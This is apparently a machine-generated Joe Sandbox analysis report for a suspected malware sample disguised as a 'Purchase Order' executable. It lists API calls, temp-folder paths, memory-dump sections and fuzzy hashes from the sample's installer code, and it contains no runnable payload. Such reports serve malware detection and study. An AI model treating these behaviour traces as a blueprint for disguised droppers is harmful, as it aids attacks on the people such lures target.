                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp
                                                                      • API String ID: 2655323295-766773280
                                                                      • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                      • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                                      • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                                      • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 707 4061a1-4061ad 708 4061ae-4061e2 GetTickCount GetTempFileNameW 707->708 709 4061f1-4061f3 708->709 710 4061e4-4061e6 708->710 712 4061eb-4061ee 709->712 710->708 711 4061e8 710->711 711->712
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004061BF
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-44229769
                                                                      • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                      • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                                      • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                                      • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                                      APIs
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 0040600A
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                        • Part of subcall function 00405BD6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120,?,00000000,000000F0), ref: 00401652
                                                                      Strings
                                                                      • C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120, xrefs: 00401645
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120
                                                                      • API String ID: 1892508949-909305818
                                                                      • Opcode ID: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                      • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                                      • Opcode Fuzzy Hash: 863e97e9a1a98ee7b9bda4f27f85bc968de3615fba3b8b02605abd041f87ab9d
                                                                      • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                      • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                                      • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                                      • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                      • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                                      • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                                      • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                      • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                                      • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                                      • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                      • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                                      • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                                      • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                      • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                                      • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                                      • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                      • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                                      • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                      • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                      • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                                      • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                      • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                        • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                                      • SetFilePointer.KERNELBASE(0012EB4C,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer$CountTick
                                                                      • String ID:
                                                                      • API String ID: 1092082344-0
                                                                      • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                      • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                                      • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                      • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,00000011,00000002), ref: 00402602
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                      • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                                      • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                      • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                      • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                                      • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                      • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                      • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
